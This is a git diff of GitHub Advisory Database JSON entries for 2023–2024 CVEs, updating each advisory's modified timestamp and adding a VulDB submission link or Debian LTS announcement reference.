b/advisories/unreviewed/2023/10/GHSA-mg88-vr9f-rg8p/GHSA-mg88-vr9f-rg8p.json index f41ac53ee1f..318696ce75a 100644 --- a/advisories/unreviewed/2023/10/GHSA-mg88-vr9f-rg8p/GHSA-mg88-vr9f-rg8p.json +++ b/advisories/unreviewed/2023/10/GHSA-mg88-vr9f-rg8p/GHSA-mg88-vr9f-rg8p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mg88-vr9f-rg8p", - "modified": "2023-10-10T15:30:51Z", + "modified": "2024-04-09T09:31:08Z", "published": "2023-10-10T15:30:51Z", "aliases": [ "CVE-2023-5491" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.241643" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.213948" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/10/GHSA-mgjv-r82f-ph9q/GHSA-mgjv-r82f-ph9q.json b/advisories/unreviewed/2023/10/GHSA-mgjv-r82f-ph9q/GHSA-mgjv-r82f-ph9q.json index 5c8ca0780b6..6712cb98893 100644 --- a/advisories/unreviewed/2023/10/GHSA-mgjv-r82f-ph9q/GHSA-mgjv-r82f-ph9q.json +++ b/advisories/unreviewed/2023/10/GHSA-mgjv-r82f-ph9q/GHSA-mgjv-r82f-ph9q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mgjv-r82f-ph9q", - "modified": "2023-10-21T06:33:59Z", + "modified": "2024-04-09T09:31:09Z", "published": "2023-10-21T06:33:59Z", "aliases": [ "CVE-2023-5683" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.243059" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.218590" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/10/GHSA-w4qc-wgxq-8xrm/GHSA-w4qc-wgxq-8xrm.json b/advisories/unreviewed/2023/10/GHSA-w4qc-wgxq-8xrm/GHSA-w4qc-wgxq-8xrm.json index 402cf0711bf..830b00f27eb 100644 --- a/advisories/unreviewed/2023/10/GHSA-w4qc-wgxq-8xrm/GHSA-w4qc-wgxq-8xrm.json +++ b/advisories/unreviewed/2023/10/GHSA-w4qc-wgxq-8xrm/GHSA-w4qc-wgxq-8xrm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w4qc-wgxq-8xrm", - "modified": "2023-10-10T15:30:51Z", + "modified": "2024-04-09T09:31:08Z", "published": "2023-10-10T15:30:51Z", "aliases": [ "CVE-2023-5489" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.241641" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.213946" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/10/GHSA-wwcw-2vrq-f4jg/GHSA-wwcw-2vrq-f4jg.json b/advisories/unreviewed/2023/10/GHSA-wwcw-2vrq-f4jg/GHSA-wwcw-2vrq-f4jg.json index c7b35b52313..1b5fd6de4ba 100644 --- a/advisories/unreviewed/2023/10/GHSA-wwcw-2vrq-f4jg/GHSA-wwcw-2vrq-f4jg.json +++ b/advisories/unreviewed/2023/10/GHSA-wwcw-2vrq-f4jg/GHSA-wwcw-2vrq-f4jg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wwcw-2vrq-f4jg", - "modified": "2023-10-10T15:30:51Z", + "modified": "2024-04-09T09:31:08Z", "published": "2023-10-10T15:30:51Z", "aliases": [ "CVE-2023-5490" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.241642" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.213947" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/11/GHSA-2wg5-v4cg-mmvr/GHSA-2wg5-v4cg-mmvr.json b/advisories/unreviewed/2023/11/GHSA-2wg5-v4cg-mmvr/GHSA-2wg5-v4cg-mmvr.json index 5ba15e94fbb..4829302d31d 100644 --- a/advisories/unreviewed/2023/11/GHSA-2wg5-v4cg-mmvr/GHSA-2wg5-v4cg-mmvr.json +++ b/advisories/unreviewed/2023/11/GHSA-2wg5-v4cg-mmvr/GHSA-2wg5-v4cg-mmvr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2wg5-v4cg-mmvr", - "modified": "2023-11-24T15:30:28Z", + "modified": "2024-04-09T09:31:09Z", "published": "2023-11-24T15:30:28Z", "aliases": [ "CVE-2023-6274" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.246103" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.234888" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/11/GHSA-p9h2-45x3-q6pj/GHSA-p9h2-45x3-q6pj.json b/advisories/unreviewed/2023/11/GHSA-p9h2-45x3-q6pj/GHSA-p9h2-45x3-q6pj.json index 1aa57295e25..9ca44862b41 100644 --- a/advisories/unreviewed/2023/11/GHSA-p9h2-45x3-q6pj/GHSA-p9h2-45x3-q6pj.json +++ b/advisories/unreviewed/2023/11/GHSA-p9h2-45x3-q6pj/GHSA-p9h2-45x3-q6pj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p9h2-45x3-q6pj", - "modified": "2023-11-11T09:30:21Z", + "modified": "2024-04-09T09:31:09Z", "published": "2023-11-11T09:30:21Z", "aliases": [ "CVE-2023-5959" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.244992" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.232562" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-3929-x7hw-wqqf/GHSA-3929-x7hw-wqqf.json b/advisories/unreviewed/2023/12/GHSA-3929-x7hw-wqqf/GHSA-3929-x7hw-wqqf.json index ec754b44805..992d6ce228e 100644 --- a/advisories/unreviewed/2023/12/GHSA-3929-x7hw-wqqf/GHSA-3929-x7hw-wqqf.json +++ b/advisories/unreviewed/2023/12/GHSA-3929-x7hw-wqqf/GHSA-3929-x7hw-wqqf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3929-x7hw-wqqf", - "modified": "2023-12-07T21:31:13Z", + "modified": "2024-04-09T09:31:09Z", "published": "2023-12-07T21:31:13Z", "aliases": [ "CVE-2023-6577" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.247157" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.243584" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-7674-425x-p4qw/GHSA-7674-425x-p4qw.json b/advisories/unreviewed/2023/12/GHSA-7674-425x-p4qw/GHSA-7674-425x-p4qw.json index f1b2efcb537..95d428464c5 100644 --- a/advisories/unreviewed/2023/12/GHSA-7674-425x-p4qw/GHSA-7674-425x-p4qw.json +++ b/advisories/unreviewed/2023/12/GHSA-7674-425x-p4qw/GHSA-7674-425x-p4qw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7674-425x-p4qw", - "modified": "2023-12-21T21:30:30Z", + "modified": "2024-04-09T09:31:09Z", "published": "2023-12-21T21:30:30Z", "aliases": [ "CVE-2023-7039" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.248688" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.250043" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-vv5h-96wr-c27f/GHSA-vv5h-96wr-c27f.json b/advisories/unreviewed/2023/12/GHSA-vv5h-96wr-c27f/GHSA-vv5h-96wr-c27f.json index 0fc925be5d4..f84d36d0458 100644 --- a/advisories/unreviewed/2023/12/GHSA-vv5h-96wr-c27f/GHSA-vv5h-96wr-c27f.json +++ b/advisories/unreviewed/2023/12/GHSA-vv5h-96wr-c27f/GHSA-vv5h-96wr-c27f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vv5h-96wr-c27f", - "modified": "2023-12-07T21:31:13Z", + "modified": "2024-04-09T09:31:09Z", "published": "2023-12-07T21:31:13Z", "aliases": [ "CVE-2023-6576" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.247156" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.242777" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-wjp2-7h9f-2jxg/GHSA-wjp2-7h9f-2jxg.json b/advisories/unreviewed/2023/12/GHSA-wjp2-7h9f-2jxg/GHSA-wjp2-7h9f-2jxg.json index d8bbaa4b558..3923f4b77eb 100644 --- a/advisories/unreviewed/2023/12/GHSA-wjp2-7h9f-2jxg/GHSA-wjp2-7h9f-2jxg.json +++ b/advisories/unreviewed/2023/12/GHSA-wjp2-7h9f-2jxg/GHSA-wjp2-7h9f-2jxg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wjp2-7h9f-2jxg", - "modified": "2023-12-07T21:31:12Z", + "modified": "2024-04-09T09:31:09Z", "published": "2023-12-07T21:31:12Z", "aliases": [ "CVE-2023-6574" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.247154" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.241172" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-xwmv-cv85-273r/GHSA-xwmv-cv85-273r.json b/advisories/unreviewed/2023/12/GHSA-xwmv-cv85-273r/GHSA-xwmv-cv85-273r.json index cfcc3584550..b1219ebe60e 100644 --- a/advisories/unreviewed/2023/12/GHSA-xwmv-cv85-273r/GHSA-xwmv-cv85-273r.json +++ b/advisories/unreviewed/2023/12/GHSA-xwmv-cv85-273r/GHSA-xwmv-cv85-273r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xwmv-cv85-273r", - "modified": "2023-12-07T21:31:12Z", + "modified": "2024-04-09T09:31:09Z", "published": "2023-12-07T21:31:12Z", "aliases": [ "CVE-2023-6575" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.247155" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.241692" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-2548-xwx6-3r34/GHSA-2548-xwx6-3r34.json b/advisories/unreviewed/2024/01/GHSA-2548-xwx6-3r34/GHSA-2548-xwx6-3r34.json index 48cd63e39a6..b7f2d9a5398 100644 --- a/advisories/unreviewed/2024/01/GHSA-2548-xwx6-3r34/GHSA-2548-xwx6-3r34.json +++ b/advisories/unreviewed/2024/01/GHSA-2548-xwx6-3r34/GHSA-2548-xwx6-3r34.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2548-xwx6-3r34", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-38583" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38583" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1827" diff --git a/advisories/unreviewed/2024/01/GHSA-2c8h-6hfp-gpv6/GHSA-2c8h-6hfp-gpv6.json b/advisories/unreviewed/2024/01/GHSA-2c8h-6hfp-gpv6/GHSA-2c8h-6hfp-gpv6.json index ad7fd68fcf7..96320e46e58 100644 --- a/advisories/unreviewed/2024/01/GHSA-2c8h-6hfp-gpv6/GHSA-2c8h-6hfp-gpv6.json +++ b/advisories/unreviewed/2024/01/GHSA-2c8h-6hfp-gpv6/GHSA-2c8h-6hfp-gpv6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2c8h-6hfp-gpv6", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-35997" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35997" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1791" diff --git a/advisories/unreviewed/2024/01/GHSA-2gjq-ggr9-9f3w/GHSA-2gjq-ggr9-9f3w.json b/advisories/unreviewed/2024/01/GHSA-2gjq-ggr9-9f3w/GHSA-2gjq-ggr9-9f3w.json index 03d737c7410..59da7a866f8 100644 --- a/advisories/unreviewed/2024/01/GHSA-2gjq-ggr9-9f3w/GHSA-2gjq-ggr9-9f3w.json +++ b/advisories/unreviewed/2024/01/GHSA-2gjq-ggr9-9f3w/GHSA-2gjq-ggr9-9f3w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2gjq-ggr9-9f3w", - "modified": "2024-01-08T15:30:30Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-01-08T15:30:30Z", "aliases": [ "CVE-2023-39414" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39414" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1824" diff --git a/advisories/unreviewed/2024/01/GHSA-2jrw-2xf6-7qh4/GHSA-2jrw-2xf6-7qh4.json b/advisories/unreviewed/2024/01/GHSA-2jrw-2xf6-7qh4/GHSA-2jrw-2xf6-7qh4.json index fac2f6abef2..446deadc777 100644 --- a/advisories/unreviewed/2024/01/GHSA-2jrw-2xf6-7qh4/GHSA-2jrw-2xf6-7qh4.json +++ b/advisories/unreviewed/2024/01/GHSA-2jrw-2xf6-7qh4/GHSA-2jrw-2xf6-7qh4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2jrw-2xf6-7qh4", - "modified": "2024-01-08T15:30:27Z", + "modified": "2024-04-09T21:31:52Z", "published": "2024-01-08T15:30:27Z", "aliases": [ "CVE-2023-35956" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35956" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1785" diff --git a/advisories/unreviewed/2024/01/GHSA-342m-47g4-wcgj/GHSA-342m-47g4-wcgj.json b/advisories/unreviewed/2024/01/GHSA-342m-47g4-wcgj/GHSA-342m-47g4-wcgj.json index cd579912784..fb104611683 100644 --- a/advisories/unreviewed/2024/01/GHSA-342m-47g4-wcgj/GHSA-342m-47g4-wcgj.json +++ b/advisories/unreviewed/2024/01/GHSA-342m-47g4-wcgj/GHSA-342m-47g4-wcgj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-342m-47g4-wcgj", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-37921" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37921" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1807" diff --git a/advisories/unreviewed/2024/01/GHSA-34p4-vjw3-68hq/GHSA-34p4-vjw3-68hq.json b/advisories/unreviewed/2024/01/GHSA-34p4-vjw3-68hq/GHSA-34p4-vjw3-68hq.json index 29976557221..763d18b575d 100644 --- a/advisories/unreviewed/2024/01/GHSA-34p4-vjw3-68hq/GHSA-34p4-vjw3-68hq.json +++ b/advisories/unreviewed/2024/01/GHSA-34p4-vjw3-68hq/GHSA-34p4-vjw3-68hq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-34p4-vjw3-68hq", - "modified": "2024-01-08T15:30:27Z", + "modified": "2024-04-09T21:31:52Z", "published": "2024-01-08T15:30:27Z", "aliases": [ "CVE-2023-34087" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34087" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1803" diff --git a/advisories/unreviewed/2024/01/GHSA-3cqp-gxcm-89f4/GHSA-3cqp-gxcm-89f4.json b/advisories/unreviewed/2024/01/GHSA-3cqp-gxcm-89f4/GHSA-3cqp-gxcm-89f4.json index 8591ebc4146..d8ce3f0481f 100644 --- a/advisories/unreviewed/2024/01/GHSA-3cqp-gxcm-89f4/GHSA-3cqp-gxcm-89f4.json +++ b/advisories/unreviewed/2024/01/GHSA-3cqp-gxcm-89f4/GHSA-3cqp-gxcm-89f4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3cqp-gxcm-89f4", - "modified": "2024-01-19T15:30:20Z", + "modified": "2024-04-09T09:31:10Z", "published": "2024-01-19T15:30:20Z", "aliases": [ "CVE-2024-0712" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.251538" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.264497" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-3g32-r9h6-fv6m/GHSA-3g32-r9h6-fv6m.json b/advisories/unreviewed/2024/01/GHSA-3g32-r9h6-fv6m/GHSA-3g32-r9h6-fv6m.json index 94e182807e9..9052f32f9b0 100644 --- a/advisories/unreviewed/2024/01/GHSA-3g32-r9h6-fv6m/GHSA-3g32-r9h6-fv6m.json +++ b/advisories/unreviewed/2024/01/GHSA-3g32-r9h6-fv6m/GHSA-3g32-r9h6-fv6m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3g32-r9h6-fv6m", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-37573" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37573" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1806" diff --git a/advisories/unreviewed/2024/01/GHSA-3j29-j9r5-2r42/GHSA-3j29-j9r5-2r42.json b/advisories/unreviewed/2024/01/GHSA-3j29-j9r5-2r42/GHSA-3j29-j9r5-2r42.json index 1bcba861d2e..da5090f79d1 100644 --- a/advisories/unreviewed/2024/01/GHSA-3j29-j9r5-2r42/GHSA-3j29-j9r5-2r42.json +++ b/advisories/unreviewed/2024/01/GHSA-3j29-j9r5-2r42/GHSA-3j29-j9r5-2r42.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3j29-j9r5-2r42", - "modified": "2024-01-08T06:31:33Z", + "modified": "2024-04-09T09:31:10Z", "published": "2024-01-08T06:31:33Z", "aliases": [ "CVE-2024-0300" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.249866" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.260962" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-3m75-6h9w-8hp6/GHSA-3m75-6h9w-8hp6.json b/advisories/unreviewed/2024/01/GHSA-3m75-6h9w-8hp6/GHSA-3m75-6h9w-8hp6.json index 0ec51cbd320..7b6290f6fdc 100644 --- a/advisories/unreviewed/2024/01/GHSA-3m75-6h9w-8hp6/GHSA-3m75-6h9w-8hp6.json +++ b/advisories/unreviewed/2024/01/GHSA-3m75-6h9w-8hp6/GHSA-3m75-6h9w-8hp6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3m75-6h9w-8hp6", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-36861" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36861" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1811" diff --git a/advisories/unreviewed/2024/01/GHSA-3mqx-ggcf-qxwg/GHSA-3mqx-ggcf-qxwg.json b/advisories/unreviewed/2024/01/GHSA-3mqx-ggcf-qxwg/GHSA-3mqx-ggcf-qxwg.json index d67c998aa02..239a046fbfc 100644 --- a/advisories/unreviewed/2024/01/GHSA-3mqx-ggcf-qxwg/GHSA-3mqx-ggcf-qxwg.json +++ b/advisories/unreviewed/2024/01/GHSA-3mqx-ggcf-qxwg/GHSA-3mqx-ggcf-qxwg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3mqx-ggcf-qxwg", - "modified": "2024-01-08T15:30:27Z", + "modified": "2024-04-09T21:31:52Z", "published": "2024-01-08T15:30:27Z", "aliases": [ "CVE-2023-35057" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35057" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1821" diff --git a/advisories/unreviewed/2024/01/GHSA-4rj9-gmxf-4rcf/GHSA-4rj9-gmxf-4rcf.json b/advisories/unreviewed/2024/01/GHSA-4rj9-gmxf-4rcf/GHSA-4rj9-gmxf-4rcf.json index 4d9b0538e17..8949b0aab02 100644 --- a/advisories/unreviewed/2024/01/GHSA-4rj9-gmxf-4rcf/GHSA-4rj9-gmxf-4rcf.json +++ b/advisories/unreviewed/2024/01/GHSA-4rj9-gmxf-4rcf/GHSA-4rj9-gmxf-4rcf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4rj9-gmxf-4rcf", - "modified": "2024-01-08T15:30:27Z", + "modified": "2024-04-09T21:31:52Z", "published": "2024-01-08T15:30:27Z", "aliases": [ "CVE-2023-35004" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35004" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1816" diff --git a/advisories/unreviewed/2024/01/GHSA-4v9c-j8h8-rg86/GHSA-4v9c-j8h8-rg86.json b/advisories/unreviewed/2024/01/GHSA-4v9c-j8h8-rg86/GHSA-4v9c-j8h8-rg86.json index e2d99dae22d..067d441a190 100644 --- a/advisories/unreviewed/2024/01/GHSA-4v9c-j8h8-rg86/GHSA-4v9c-j8h8-rg86.json +++ b/advisories/unreviewed/2024/01/GHSA-4v9c-j8h8-rg86/GHSA-4v9c-j8h8-rg86.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4v9c-j8h8-rg86", - "modified": "2024-01-08T15:30:27Z", + "modified": "2024-04-09T21:31:52Z", "published": "2024-01-08T15:30:27Z", "aliases": [ "CVE-2023-32650" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32650" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1777" diff --git a/advisories/unreviewed/2024/01/GHSA-5g3m-p64v-8cm3/GHSA-5g3m-p64v-8cm3.json b/advisories/unreviewed/2024/01/GHSA-5g3m-p64v-8cm3/GHSA-5g3m-p64v-8cm3.json index a2d29113594..4247f570ee1 100644 --- a/advisories/unreviewed/2024/01/GHSA-5g3m-p64v-8cm3/GHSA-5g3m-p64v-8cm3.json +++ b/advisories/unreviewed/2024/01/GHSA-5g3m-p64v-8cm3/GHSA-5g3m-p64v-8cm3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5g3m-p64v-8cm3", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-37418" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37418" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1804" diff --git a/advisories/unreviewed/2024/01/GHSA-5j2r-c4r4-2f9c/GHSA-5j2r-c4r4-2f9c.json b/advisories/unreviewed/2024/01/GHSA-5j2r-c4r4-2f9c/GHSA-5j2r-c4r4-2f9c.json index 875ec6a8f4d..c439756acde 100644 --- a/advisories/unreviewed/2024/01/GHSA-5j2r-c4r4-2f9c/GHSA-5j2r-c4r4-2f9c.json +++ b/advisories/unreviewed/2024/01/GHSA-5j2r-c4r4-2f9c/GHSA-5j2r-c4r4-2f9c.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5j2r-c4r4-2f9c", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-37444" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37444" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1805" diff --git a/advisories/unreviewed/2024/01/GHSA-5x66-w85v-593v/GHSA-5x66-w85v-593v.json b/advisories/unreviewed/2024/01/GHSA-5x66-w85v-593v/GHSA-5x66-w85v-593v.json index 6b8b366e3df..3f09a7c96a2 100644 --- a/advisories/unreviewed/2024/01/GHSA-5x66-w85v-593v/GHSA-5x66-w85v-593v.json +++ b/advisories/unreviewed/2024/01/GHSA-5x66-w85v-593v/GHSA-5x66-w85v-593v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5x66-w85v-593v", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-39235" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39235" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1817" diff --git a/advisories/unreviewed/2024/01/GHSA-5xjp-7w7g-522j/GHSA-5xjp-7w7g-522j.json b/advisories/unreviewed/2024/01/GHSA-5xjp-7w7g-522j/GHSA-5xjp-7w7g-522j.json index e59aaae25e0..44de25e6d47 100644 --- a/advisories/unreviewed/2024/01/GHSA-5xjp-7w7g-522j/GHSA-5xjp-7w7g-522j.json +++ b/advisories/unreviewed/2024/01/GHSA-5xjp-7w7g-522j/GHSA-5xjp-7w7g-522j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5xjp-7w7g-522j", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-39234" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39234" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1817" diff --git a/advisories/unreviewed/2024/01/GHSA-64mj-745w-r3p7/GHSA-64mj-745w-r3p7.json b/advisories/unreviewed/2024/01/GHSA-64mj-745w-r3p7/GHSA-64mj-745w-r3p7.json index c99432a3f5e..44d058b4aaf 100644 --- a/advisories/unreviewed/2024/01/GHSA-64mj-745w-r3p7/GHSA-64mj-745w-r3p7.json +++ b/advisories/unreviewed/2024/01/GHSA-64mj-745w-r3p7/GHSA-64mj-745w-r3p7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-64mj-745w-r3p7", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-38657" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38657" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1823" diff --git a/advisories/unreviewed/2024/01/GHSA-655f-j2cx-ww9q/GHSA-655f-j2cx-ww9q.json b/advisories/unreviewed/2024/01/GHSA-655f-j2cx-ww9q/GHSA-655f-j2cx-ww9q.json index 37487a36733..c8e63b94fa7 100644 --- a/advisories/unreviewed/2024/01/GHSA-655f-j2cx-ww9q/GHSA-655f-j2cx-ww9q.json +++ b/advisories/unreviewed/2024/01/GHSA-655f-j2cx-ww9q/GHSA-655f-j2cx-ww9q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": 